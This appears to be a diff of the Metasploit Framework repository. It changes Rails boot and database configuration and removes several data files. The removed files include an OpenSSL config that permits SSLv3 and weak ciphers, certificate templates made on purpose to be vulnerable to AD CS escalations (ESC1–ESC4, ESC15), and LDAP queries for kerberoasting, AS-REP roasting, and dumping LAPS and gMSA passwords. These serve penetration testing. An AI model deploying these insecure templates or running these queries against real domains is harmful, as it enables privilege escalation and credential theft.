-Fiddle.const_set(:VERSION, '0.0.0') unless Fiddle.const_defined?(:VERSION)
-
 require 'rails'
 require File.expand_path('../boot', __FILE__)

-require 'action_view'
-# Monkey patch https://github.com/rails/rails/blob/v7.2.2.1/actionview/lib/action_view/helpers/tag_helper.rb#L51
-# Might be fixed by 8.x https://github.com/rails/rails/blob/v8.0.2/actionview/lib/action_view/helpers/tag_helper.rb#L51C1-L52C1
-raise unless ActionView::VERSION::STRING == '7.2.2.2' # A developer will need to ensure this is still required when bumping rails
-module ActionView::Helpers::TagHelper
-  class TagBuilder
-    def self.define_element(name, code_generator:, method_name: name.to_s.underscore)
-      code_generator.define_cached_method(method_name, namespace: :tag_builder) do |batch|
-        # Fixing a bug introduced by Metasploit's global Kernel patch: https://github.com/rapid7/metasploit-framework/blob/ae1db09f32cd04c007dbf445cf16dc22c9fc2e53/lib/rex.rb#L74-L79
-        # which fails when using the below 'instance_methods.include?(method_name.to_sym)' check
-        batch.push(<<~RUBY) # unless instance_methods.include?(method_name.to_sym)
-              def #{method_name}(content = nil, escape: true, **options, &block)
-                tag_string("#{name}", content, options, escape: escape, &block)
-              end
-            RUBY
-      end
-    end
-  end
-end
-
 all_environments = [
    :development,
    :production,
@@ -52,6 +29,7 @@ require 'action_view/railtie'

 require 'metasploit/framework/common_engine'
 require 'metasploit/framework/database'
+
 module Metasploit
  module Framework
    class Application < Rails::Application
@@ -59,15 +37,18 @@ module Metasploit

      config.paths['log']             = "#{Msf::Config.log_directory}/#{Rails.env}.log"
      config.paths['config/database'] = [Metasploit::Framework::Database.configurations_pathname.try(:to_path)]
-      config.autoloader = :zeitwerk

-      config.load_defaults 7.2
-
-      config.eager_load = false
+      case Rails.env
+      when "development"
+        config.eager_load = false
+      when "test"
+        config.eager_load = false
+      when "production"
+        config.eager_load = true
+      end
    end
  end
 end

 # Silence warnings about this defaulting to true
 I18n.enforce_available_locales = true
-require 'msfenv'
@@ -24,12 +24,9 @@ end

 begin
  require 'bundler/setup'
-rescue LoadError => e
-  $stderr.puts "[*] Bundler failed to load and returned this error:"
-  $stderr.puts
-  $stderr.puts "   '#{e}'"
-  $stderr.puts
-  $stderr.puts "[*] You may need to uninstall or upgrade bundler"
+rescue LoadError
+  $stderr.puts "[*] Metasploit requires the Bundler gem to be installed"
+  $stderr.puts "    $ gem install bundler"
  exit(1)
 end

@@ -38,64 +35,3 @@ lib_path = root.join('lib').to_path
 unless $LOAD_PATH.include? lib_path
  $LOAD_PATH.unshift lib_path
 end
-
-require 'digest'
-require 'metasploit/framework/version'
-require 'msf/base/config'
-
-# Invalidate and delete the bootsnap cache if required. For instance if the metasploit-framework version has changed.
-#
-# @param [Hash] bootsnap_config See https://github.com/Shopify/bootsnap/blob/95e8d170aea99a831fd484ce09ad2f195644e740/lib/bootsnap.rb#L38
-# @return [void]
-def invalidate_bootsnap_cache!(bootsnap_config)
-  expected_cache_metadata = {
-    'metasploit_framework_version' => Metasploit::Framework::Version::VERSION,
-    'ruby_description' => RUBY_DESCRIPTION,
-    'bundler_lockfile_hash' => Digest::MD5.hexdigest(Bundler.read_file(Bundler.default_lockfile)),
-    'bootsnap_config' => {
-      'load_path_cache' => bootsnap_config[:load_path_cache],
-      'compile_cache_iseq' => bootsnap_config[:compile_cache_iseq],
-      'compile_cache_yaml' => bootsnap_config[:compile_cache_yaml],
-    }
-  }
-
-  cache_metadata_path = File.join(bootsnap_config[:cache_dir], "metadata.yaml")
-  if File.exist?(cache_metadata_path)
-    cache_metadata = YAML.safe_load(File.binread(cache_metadata_path))
-    if cache_metadata != expected_cache_metadata
-      FileUtils.rm_rf(bootsnap_config[:cache_dir], secure: true)
-    end
-  end
-
-  FileUtils.mkdir_p(bootsnap_config[:cache_dir])
-  File.binwrite(cache_metadata_path, expected_cache_metadata.to_yaml)
-
-  nil
-end
-
-# Attempt to use bootsnap caching for improved startup time
-begin
-  require 'bootsnap'
-  env = ENV['RAILS_ENV'] || ENV['RACK_ENV'] || ENV['ENV']
-  development_mode = ['', nil, 'development'].include?(env)
-
-  cache_dir = ::File.join(Msf::Config.config_directory, "bootsnap_cache")
-  bootsnap_config = {
-    cache_dir: cache_dir,
-    ignore_directories: [],
-    development_mode: development_mode,
-    load_path_cache: true, # Optimize the LOAD_PATH with a cache
-    compile_cache_iseq: false, # Don't compile Ruby code into ISeq cache, breaks coverage reporting.
-    compile_cache_yaml: false, # Don't compile YAML into a cache
-    readonly: false, # Update caches - https://github.com/Shopify/bootsnap/commit/b51397f96c33aa421fd5c29484fb9574df9eb451
-  }
-  invalidate_bootsnap_cache!(bootsnap_config)
-  Bootsnap.setup(**bootsnap_config)
-rescue => e
-  $stderr.puts "Warning: Failed bootsnap cache setup - #{e.class} #{e} #{e.backtrace}"
-  begin
-    FileUtils.rm_rf(cache_dir, secure: true)
-  rescue
-    $stderr.puts 'Warning: Failed deleting bootsnap cache'
-  end
-end
@@ -1,25 +0,0 @@
-# @note This file is only for use in GitHub Actions.  If you need to make a
-# config/database.yml for running rake, rake spec, or rspec locally, please
-# customize `conifg/database.yml.example`
-#
-# @example Customizing config/database.yml.example
-#   cp config/database.yml.example config/database.yml
-#   # update password fields for each environment's user
-
-development: &pgsql
-  adapter: postgresql
-  database: metasploit_framework_development
-  host: localhost
-  username: postgres
-  password: postgres
-  pool: 25
-  timeout: 5
-
-# Warning: The database defined as "test" will be erased and
-# re-generated from your development database when you run "rake".
-# Do not set this db to the same as development or production.
-#
-# Note also, sqlite3 is totally unsupported by Metasploit now.
-test:
-  <<: *pgsql
-  database: metasploit_framework_test
@@ -0,0 +1,27 @@
+# @note This file is only for use in travis-ci.  If you need to make a
+# config/database.yml for running rake, rake spec, or rspec locally, please
+# customize `conifg/database.yml.example`
+#
+# @example Customizing config/database.yml.example
+#   cp config/database.yml.example config/database.yml
+#   # update password fields for each environment's user
+
+# Using the postgres user locally without a host and port is the supported
+# configuration from Travis-CI
+#
+# @see http://about.travis-ci.org/docs/user/database-setup/#PostgreSQL
+development: &pgsql
+  adapter: postgresql
+  database: metasploit_framework_development
+  username: postgres
+  pool: 5
+  timeout: 5
+
+# Warning: The database defined as "test" will be erased and
+# re-generated from your development database when you run "rake".
+# Do not set this db to the same as development or production.
+#
+# Note also, sqlite3 is totally unsupported by Metasploit now.
+test:
+  <<: *pgsql
+  database: metasploit_framework_test
@@ -1,4 +1,5 @@
 # Load the rails application
 require File.expand_path('../application', __FILE__)
+
 # Initialize the rails application
 Metasploit::Framework::Application.initialize!
@@ -1,33 +0,0 @@
-# Metasploit RPC API connection (MessagePack)
-msf_api:
-  type: messagepack
-  host: localhost
-  port: 55553
-  ssl: true
-  endpoint: /api/
-  user: msfuser
-  password: CHANGEME
-  auto_start_rpc: true  # Automatically start the RPC server if not running (default: true)
-
-# MCP server configuration
-mcp:
-  transport: stdio  # stdio (default) or http
-  # MCP server network configuration (for HTTP transport only)
-  host: localhost  # Host to bind to (default: localhost)
-  port: 3000       # Port to listen on (default: 3000)
-
-# Rate limiting (optional - defaults shown)
-rate_limit:
-  enabled: true
-  requests_per_minute: 60
-  # If the `burst_size` is greater than `requests_per_minute`, a user will be allowed to exceed the rate limit temporarily.
-  # For example, with `requests_per_minute=5` and `burst_size=10`, a user could make 10 requests in a short period,
-  # but then would be limited to 5 requests per minute thereafter.
-  burst_size: 10
-
-# Logging (optional - defaults shown)
-logging:
-  enabled: false
-  level: INFO  # DEBUG, INFO, WARN, ERROR
-  log_file: ~/.msf4/logs/msfmcp.log
-  sanitize: true
@@ -1,32 +0,0 @@
-# Metasploit RPC API connection (JSON-RPC)
-msf_api:
-  type: json-rpc
-  host: localhost
-  port: 8081
-  ssl: true
-  endpoint: /api/v1/json-rpc
-  token: YOUR_BEARER_TOKEN_HERE
-  # auto_start_rpc is not supported for JSON-RPC (only MessagePack)
-
-# MCP server configuration
-mcp:
-  transport: stdio  # stdio (default) or http
-  # MCP server network configuration (for HTTP transport only)
-  host: localhost  # Host to bind to (default: localhost)
-  port: 3000       # Port to listen on (default: 3000)
-
-# Rate limiting (optional - defaults shown)
-rate_limit:
-  enabled: true
-  requests_per_minute: 60
-  # If the `burst_size` is greater than `requests_per_minute`, a user will be allowed to exceed the rate limit temporarily.
-  # For example, with `requests_per_minute=5` and `burst_size=10`, a user could make 10 requests in a short period,
-  # but then would be limited to 5 requests per minute thereafter.
-  burst_size: 10
-
-# Logging (optional - defaults shown)
-logging:
-  enabled: false
-  level: INFO  # DEBUG, INFO, WARN, ERROR
-  log_file: ~/.msf4/logs/msfmcp.log
-  sanitize: true
@@ -1,23 +0,0 @@
-openssl_conf = openssl_init
-
-[openssl_init]
-providers = provider_sect
-ssl_conf = ssl_sect
-
-[provider_sect]
-default = default_sect
-legacy = legacy_sect
-
-[default_sect]
-activate = 1
-
-[legacy_sect]
-activate = 1
-
-[ssl_sect]
-system_default = system_default_sect
-
-[system_default_sect]
-MinProtocol = SSLv3
-CipherString = ALL:@SECLEVEL=0
-Options = UnsafeLegacyRenegotiation
@@ -1,17 +0,0 @@
---
-info:
-  title: Metasploit Framework
-  description: Metasploit Framework
-  x-cortex-git:
-    github:
-      alias: r7org
-      repository: rapid7/metasploit-framework
-  x-cortex-tag: metasploit-framework
-  x-cortex-type: service
-  x-cortex-domain-parents:
-  - tag: metasploit
-  x-cortex-groups:
-  - exposure:external-ship
-openapi: 3.0.1
-servers:
- url: "/"
@@ -1,7 +0,0 @@
-This folder contains various data files used for a variety of purposes, including but not limited to banners for the
-console, exploit source code for exploits (under `data/exploits`), template code and binaries, wordlists and shellcode.
-
-As a general rule of thumb this folder will most often be used when you are using compiled binaries or source code from
-other exploits for cases such as local privilege escalation exploits and need to provide the exploit code and compiled
-binaries so that maintainers can verify the binary and compile it themselves, as so that modules can find the R7 compiled
-version of the resulting binary for use during exploitation.
@@ -1,31 +0,0 @@
---
-# Creates a template that will be vulnerable to ESC15 (subject name supplied in
-# the request and schema version is 1). Fields are based on the SubCA template.
-# For field descriptions, see:
-# https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
-showInAdvancedViewOnly: 'TRUE'
-# this security descriptor grants all permissions to all authenticated users
-nTSecurityDescriptor: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
-flags: 0
-pKIDefaultKeySpec: 2
-pKIKeyUsage: !binary |-
-  hgA=
-pKIMaxIssuingDepth: -1
-pKICriticalExtensions:
- 2.5.29.19
- 2.5.29.15
-pKIExtendedKeyUsage:
-# Server Authentication OID (alter the EKUs via ESC15)
- 1.3.6.1.5.5.7.3.1
-pKIExpirationPeriod: !binary |-
-  AEAepOhl+v8=
-pKIOverlapPeriod: !binary |-
-  AICmCv/e//8=
-pKIDefaultCSPs: 1,Microsoft Enhanced Cryptographic Provider v1.0
-msPKI-RA-Signature: 0
-msPKI-Enrollment-Flag: 0
-# CT_FLAG_EXPORTABLE_KEY
-msPKI-Private-Key-Flag: 0x10
-# CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
-msPKI-Certificate-Name-Flag: 1
-msPKI-Minimal-Key-Size: 2048
@@ -1,27 +0,0 @@
---
-# Creates a template that will be vulnerable to ESC1 (subject name supplied in
-# the request). Fields are based on the SubCA template. For field descriptions,
-# see: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
-showInAdvancedViewOnly: 'TRUE'
-# this security descriptor grants all permissions to all authenticated users
-nTSecurityDescriptor: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
-flags: 0
-pKIDefaultKeySpec: 2
-pKIKeyUsage: !binary |-
-  hgA=
-pKIMaxIssuingDepth: -1
-pKICriticalExtensions:
- 2.5.29.19
- 2.5.29.15
-pKIExpirationPeriod: !binary |-
-  AEAepOhl+v8=
-pKIOverlapPeriod: !binary |-
-  AICmCv/e//8=
-pKIDefaultCSPs: 1,Microsoft Enhanced Cryptographic Provider v1.0
-msPKI-RA-Signature: 0
-msPKI-Enrollment-Flag: 0
-# CT_FLAG_EXPORTABLE_KEY
-msPKI-Private-Key-Flag: 0x10
-# CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
-msPKI-Certificate-Name-Flag: 1
-msPKI-Minimal-Key-Size: 2048
@@ -1,30 +0,0 @@
---
-# Creates a template that will be vulnerable to ESC2 (any purpose EKU).
-# Fields are based on the SubCA template. For field descriptions,
-# see: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
-showInAdvancedViewOnly: 'TRUE'
-# this security descriptor grants all permissions to all authenticated users
-nTSecurityDescriptor: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
-flags: 0
-pKIDefaultKeySpec: 2
-pKIKeyUsage: !binary |-
-  hgA=
-pKIMaxIssuingDepth: 0
-pKICriticalExtensions:
- 2.5.29.19
- 2.5.29.15
-pKIExtendedKeyUsage:
-# Any Purpose OID
- 2.5.29.37.0
-pKIExpirationPeriod: !binary |-
-  AEAepOhl+v8=
-pKIOverlapPeriod: !binary |-
-  AICmCv/e//8=
-pKIDefaultCSPs: 1,Microsoft Enhanced Cryptographic Provider v1.0
-msPKI-RA-Signature: 0
-msPKI-Enrollment-Flag: 0
-# CT_FLAG_EXPORTABLE_KEY
-msPKI-Private-Key-Flag: 0x10
-# CT_FLAG_SUBJECT_ALT_REQUIRE_UPN | CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH
-msPKI-Certificate-Name-Flag: 0x82000000
-msPKI-Minimal-Key-Size: 2048
@@ -1,30 +0,0 @@
---
-# Creates a template that will be vulnerable to ESC3 (certificate request agent EKU).
-# Fields are based on the SubCA template. For field descriptions,
-# see: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
-showInAdvancedViewOnly: 'TRUE'
-# this security descriptor grants all permissions to all authenticated users
-nTSecurityDescriptor: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
-flags: 0
-pKIDefaultKeySpec: 2
-pKIKeyUsage: !binary |-
-  hgA=
-pKIMaxIssuingDepth: 0
-pKICriticalExtensions:
- 2.5.29.19
- 2.5.29.15
-pKIExtendedKeyUsage:
-# Certificate Request Agent OID
- 1.3.6.1.4.1.311.20.2.1
-pKIExpirationPeriod: !binary |-
-  AEAepOhl+v8=
-pKIOverlapPeriod: !binary |-
-  AICmCv/e//8=
-pKIDefaultCSPs: 1,Microsoft Enhanced Cryptographic Provider v1.0
-msPKI-RA-Signature: 0
-msPKI-Enrollment-Flag: 0
-# CT_FLAG_EXPORTABLE_KEY
-msPKI-Private-Key-Flag: 0x10
-# CT_FLAG_SUBJECT_ALT_REQUIRE_UPN | CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH
-msPKI-Certificate-Name-Flag: 0x82000000
-msPKI-Minimal-Key-Size: 2048
@@ -1,30 +0,0 @@
---
-# Creates a template that will be vulnerable to ESC4 (certificate has weak edit permissions).
-# Fields are based on the SubCA template. For field descriptions,
-# see: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
-showInAdvancedViewOnly: 'TRUE'
-# this security descriptor grants all permissions to all authenticated users (this is what makes the template vulnerable to ESC4)
-nTSecurityDescriptor: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
-flags: 0
-pKIDefaultKeySpec: 2
-pKIKeyUsage: !binary |-
-  hgA=
-pKIMaxIssuingDepth: 0
-pKICriticalExtensions:
-  - 2.5.29.19
-  - 2.5.29.15
-pKIExtendedKeyUsage:
-# Server Authentication OID (Not necessary although if left blank this template would also be vulnerable to ESC2)
-  - 1.3.6.1.5.5.7.3.1
-pKIExpirationPeriod: !binary |-
-  AEAepOhl+v8=
-pKIOverlapPeriod: !binary |-
-  AICmCv/e//8=
-pKIDefaultCSPs: 1,Microsoft Enhanced Cryptographic Provider v1.0
-msPKI-RA-Signature: 0
-msPKI-Enrollment-Flag: 0
-# CT_FLAG_EXPORTABLE_KEY
-msPKI-Private-Key-Flag: 0x10
-# CT_FLAG_SUBJECT_ALT_REQUIRE_UPN | CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH
-msPKI-Certificate-Name-Flag: 0x82000000
-msPKI-Minimal-Key-Size: 2048
@@ -1,398 +0,0 @@
---
-queries:
-  - action: ENUM_ACCOUNTS
-    description: 'Dump info about all known user accounts in the domain.'
-    filter: '(|(objectClass=organizationalPerson)(sAMAccountType=805306368)(objectcategory=user)(objectClass=user))'
-    attributes:
-      - dn
-      - name
-      - description
-      - displayName
-      - sAMAccountName
-      - objectSID
-      - userPrincipalName
-      - userAccountControl
-      - homeDirectory
-      - homeDrive
-      - profilePath
-      - memberof
-      - lastLogoff
-      - lastLogon
-      - lastLogonDate
-      - logonCount
-      - badPwdCount
-      - pwdLastSet
-      - SmartcardLogonRequired
-      - LastBadPasswordAttempt
-      - PasswordLastSet
-      - PaswordNeverExpires
-    references:
-      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
-      - https://adsecurity.org/wp-content/uploads/2016/08/DEFCON24-2016-Metcalf-BeyondTheMCSE-RedTeamingActiveDirectory.pdf
-  - action: ENUM_AD_CS_CAS
-    description: 'Enumerate AD Certificate Service certificate authorities.'
-    base_dn_prefix: 'CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration'
-    filter: '(objectClass=pKIEnrollmentService)'
-    attributes:
-      - cn
-      - name
-      - cACertificateDN
-      - dNSHostname
-      - certificateTemplates
-      - objectGUID
-      - caCertificate
-    references:
-      - https://aaroneg.com/post/2018-05-15-enterprise-ca/
-  - action: ENUM_AD_CS_CERT_TEMPLATES
-    description: 'Enumerate AD Certificate Service certificate templates.'
-    base_dn_prefix: 'CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration'
-    filter: '(objectClass=pkicertificatetemplate)'
-    attributes:
-      - cn
-      - name
-      - displayName
-      - msPKI-Cert-Template-OID
-      - msPKI-Template-Schema-Version
-      - msPKI-Enrollment-Flag
-      - msPKI-Certificate-Name-Flag
-      - msPKI-Private-Key-Flag
-      - msPKI-RA-Signature
-      - pKIExtendedKeyUsage
-    references:
-      - https://web.archive.org/web/20220818094600if_/https://specterops.io/assets/resources/Certified_Pre-Owned.pdf
-  - action: ENUM_ADMIN_OBJECTS
-    description: 'Dump info about all objects with protected ACLs (i.e highly privileged objects).'
-    filter: '(adminCount=1)'
-    attributes:
-      - dn
-      - description
-      - distinguishedName
-      - name
-      - samAccountName
-      - objectSID
-      - objectGUID
-      - objectCategory
-      - member
-      - memberof
-    references:
-      - https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
-  - action: ENUM_ALL_OBJECT_CATEGORY
-    description: 'Dump all objects containing any objectCategory field.'
-    filter: '(objectCategory=*)'
-    attributes:
-      - dn
-      - objectCategory
-  - action: ENUM_ALL_OBJECT_CLASS
-    description: 'Dump all objects containing any objectClass field.'
-    filter: '(objectClass=*)'
-    attributes:
-      - dn
-      - objectClass
-  - action: ENUM_COMPUTERS
-    description: 'Dump all objects containing an objectCategory or objectClass of Computer.'
-    filter: '(|(objectCategory=computer)(objectClass=computer))'
-    attributes:
-      - dn
-      - name
-      - description
-      - displayName
-      - sAMAccountName
-      - objectSID
-      - distinguishedName
-      - dNSHostName
-      - givenName
-      - operatingSystem
-      - operatingSystemVersion
-      - operatingSystemServicePack
-      - lastLogonTimestamp
-      - servicePrincipalName
-      - primaryGroupId
-    references:
-      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
-      - https://adsecurity.org/wp-content/uploads/2016/08/DEFCON24-2016-Metcalf-BeyondTheMCSE-RedTeamingActiveDirectory.pdf
-  - action: ENUM_CONSTRAINED_DELEGATION
-    description: 'Dump info about all known objects that allow contrained delegation.'
-    filter: '(userAccountControl:1.2.840.113556.1.4.803:=16777216)'
-    attributes:
-      - cn
-      - sAMAccountName
-      - objectCategory
-      - msds-allowedtodelegateto
-      - servicePrincipalName
-    references:
-      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
-      - https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation
-  - action: ENUM_DNS_RECORDS
-    description: 'Dump info about DNS records the server knows about using the dnsNode object class.'
-    filter: '(objectClass=dnsNode)'
-    attributes:
-      - dc
-      - cn
-      - dnsRecord
-      - dnsTombstoned
-      - name
-    references:
-      - https://www.netspi.com/blog/technical/network-penetration-testing/exploiting-adidns/
-      - https://github.com/dirkjanm/krbrelayx/blob/master/dnstool.py
-  - action: ENUM_DNS_ZONES
-    description: 'Dump all known DNS zones using the dnsZone object class under the DC DomainDnsZones. Without A BASEDN prefix you can miss certain entries.'
-    filter: '(objectClass=dnsZone)'
-    base_dn_prefix: 'DC=DomainDnsZones'
-    attributes:
-      - name
-      - distinguishedName
-    references:
-      - https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
-  - action: ENUM_DOMAIN
-    description: 'Dump info about the Active Directory domain.'
-    filter: '(objectClass=domain)'
-    attributes:
-      - ms-DS-MachineAccountQuota
-      - objectSID
-      - name
-      - lockoutduration
-      - lockoutthreshold
-      - minpwdage
-      - maxpwdage
-      - minpwdlength
-  - action: ENUM_DOMAIN_CONTROLLERS
-    description: 'Dump all known domain controllers.'
-    filter: '(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))'
-    attributes:
-      - dn
-      - displayName
-      - distinguishedName
-      - dNSHostName
-      - description
-      - givenName
-      - name
-      - operatingSystem
-      - operatingSystemVersion
-      - operatingSystemServicePack
-    references:
-      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
-      - https://adsecurity.org/wp-content/uploads/2016/08/DEFCON24-2016-Metcalf-BeyondTheMCSE-RedTeamingActiveDirectory.pdf
-  - action: ENUM_EXCHANGE_RECIPIENTS
-    description: 'Dump info about all known Exchange recipients.'
-    filter: '(|(mailNickname=*)(proxyAddresses=FAX:*))'
-    attributes:
-      - dn
-      - mailNickname
-      - proxyAddresses
-      - name
-    references:
-      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
-  - action: ENUM_EXCHANGE_SERVERS
-    description: 'Dump info about all known Exchange servers.'
-    filter: '(&(objectClass=msExchExchangeServer)(!(objectClass=msExchExchangeServerPolicy)))'
-    attributes:
-      - dn
-      - displayName
-      - distinguishedName
-      - dNSHostName
-      - description
-      - givenName
-      - name
-      - operatingSystem
-      - operatingSystemVersion
-      - operatingSystemServicePack
-    references:
-      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
-      - https://adsecurity.org/wp-content/uploads/2016/08/DEFCON24-2016-Metcalf-BeyondTheMCSE-RedTeamingActiveDirectory.pdf
-  - action: ENUM_GMSA_HASHES
-    description: 'Dump info about GMSAs and their password hashes if available.'
-    filter: '(objectClass=msDS-GroupManagedServiceAccount)'
-    attributes:
-      - cn
-      - displayName
-      - msDS-ManagedPassword
-    references:
-      - https://stealthbits.com/blog/securing-gmsa-passwords/
-      - https://o365blog.com/post/gmsa/
-      - https://adsecurity.org/?p=4367
-  - action: ENUM_GROUPS
-    description: 'Dump info about all known groups in the LDAP environment.'
-    filter: '(|(objectClass=group)(objectClass=groupOfNames)(groupType:1.2.840.113556.1.4.803:=2147483648)(objectClass=posixGroup)(objectcategory=group))'
-    attributes:
-      - cn
-      - name
-      - description
-      - groupType
-      - memberof
-      - member
-      - owner
-      - adminCount
-      - managedBy
-      - groupAttributes
-      - objectSID
-    references:
-      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
-  - action: ENUM_GROUP_POLICY_OBJECTS
-    description: 'Dump info about all known Group Policy Objects (GPOs) in the LDAP environment.'
-    filter: '(objectClass=groupPolicyContainer)'
-    attributes:
-      - displayName
-      - gPCFileSysPath
-      - objectCategory
-      - objectGUID
-    references:
-      - https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
-  - action: ENUM_HOSTNAMES
-    description: 'Dump info about all known hostnames in the LDAP environment.'
-    filter: '(dnsHostName=*)'
-    attributes:
-      - dn
-      - name
-      - dnsHostName
-      - serverName
-    references:
-      - https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
-      - https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
-  - action: ENUM_LAPS_PASSWORDS
-    description: 'Dump info about computers that have LAPS v1 enabled, and passwords for them if available.'
-    filter: '(ms-MCS-AdmPwd=*)'
-    attributes:
-      - cn
-      - displayName
-      - ms-MCS-AdmPwd
-    references:
-      - https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/ldap-ldaps
-  - action: ENUM_LDAP_SERVER_METADATA
-    description: 'Dump metadata about the setup of the domain.'
-    filter: '(objectClass=*)'
-    attributes:
-      - dn
-      - defaultNamingContext
-      - domainFunctionality
-      - forestFunctionality
-      - domainControllerFunctionality
-      - dnsHostName
-    references:
-      - https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
-  - action: ENUM_MACHINE_ACCOUNT_QUOTA
-    description: 'Dump the number of computer accounts a user is allowed to create in a domain.'
-    filter: '(objectClass=domain)'
-    attributes:
-      - ms-DS-MachineAccountQuota
-    references:
-      - https://learn.microsoft.com/en-us/windows/win32/adschema/a-ms-ds-machineaccountquota
-  - action: ENUM_ORGROLES
-    description: 'Dump info about all known organization roles in the LDAP environment.'
-    filter: '(objectClass=organizationalRole)'
-    attributes:
-      - displayName
-      - name
-      - description
-  - action: ENUM_ORGUNITS
-    description: 'Dump info about all known organizational units in the LDAP environment.'
-    filter: '(objectClass=organizationalUnit)'
-    attributes:
-      - displayName
-      - name
-      - description
-    references:
-      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
-  - action: ENUM_UNCONSTRAINED_DELEGATION
-    description: 'Dump info about all known objects that allow unconstrained delegation.'
-    filter: '(userAccountControl:1.2.840.113556.1.4.803:=524288)'
-    attributes:
-      - cn
-      - sAMAccountName
-      - objectCategory
-      - memberof
-      - member
-    references:
-      - https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation
-      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
-  - action: ENUM_USER_ACCOUNT_DISABLED
-    description: 'Dump info about disabled user accounts.'
-    filter: '(userAccountControl:1.2.840.113556.1.4.803:=2)'
-    attributes:
-      - cn
-      - displayName
-      - description
-      - sAMAccountName
-      - userPrincipalName
-      - userAccountControl
-  - action: ENUM_USER_ACCOUNT_LOCKED_OUT
-    description: 'Dump info about locked out user accounts.'
-    filter: '(userAccountControl:1.2.840.113556.1.4.803:=16)'
-    attributes:
-      - cn
-      - displayName
-      - sAMAccountName
-      - userPrincipalName
-      - userAccountControl
-    references:
-      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
-  - action: ENUM_USER_ASREP_ROASTABLE
-    description: 'Dump all users who are configured not to require kerberos pre-authentication, i.e. AS-REP roastable.'
-    filter: '(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))'
-    attributes:
-      - cn
-      - displayName
-      - description
-      - sAMAccountName
-      - userPrincipalName
-      - userAccountControl
-    references:
-      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
-      - https://burmat.gitbook.io/security/hacking/domain-exploitation
-  - action: ENUM_USER_PASSWORD_NEVER_EXPIRES
-    description: 'Dump info about all users whose password never expires.'
-    filter: '(userAccountControl:1.2.840.113556.1.4.803:=65536)'
-    attributes:
-      - cn
-      - displayName
-      - description
-      - sAMAccountName
-      - userPrincipalName
-      - userAccountControl
-    references:
-      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
-  - action: ENUM_USER_PASSWORD_NOT_REQUIRED
-    description: 'Dump info about all users whose password never expires and whose account is still enabled.'
-    filter: '(&(userAccountControl:1.2.840.113556.1.4.803:=32)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
-    attributes:
-      - cn
-      - displayName
-      - description
-      - sAMAccountName
-      - userPrincipalName
-      - userAccountControl
-    references:
-      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
-  - action: ENUM_USER_SPNS_KERBEROAST
-    description: 'Dump info about all user objects with Service Principal Names (SPNs) for kerberoasting.'
-    filter: '(&(&(servicePrincipalName=*)(userAccountControl:1.2.840.113556.1.4.803:=512))(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
-    attributes:
-      - cn
-      - sAMAccountName
-      - servicePrincipalName
-    references:
-      - https://malicious.link/post/2022/ldapsearch-reference/
-      - https://burmat.gitbook.io/security/hacking/domain-exploitation
-      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
-  - action: ENUM_PRE_WINDOWS_2000_COMPUTERS
-    description: 'Dump info about all computer objects likely created as a "pre-Windows 2000 computer", for which the password might be predictable.'
-    filter: '(&(userAccountControl=4128))'
-    attributes:
-      - cn
-      - displayName
-      - description
-      - sAMAccountName
-      - userPrincipalName
-      - logonCount
-      - userAccountControl
-    references:
-      - https://www.thehacker.recipes/ad/movement/builtins/pre-windows-2000-computers
-      - https://trustedsec.com/blog/diving-into-pre-created-computer-accounts
-  - action: ENUM_SCCM_MANAGEMENT_POINTS
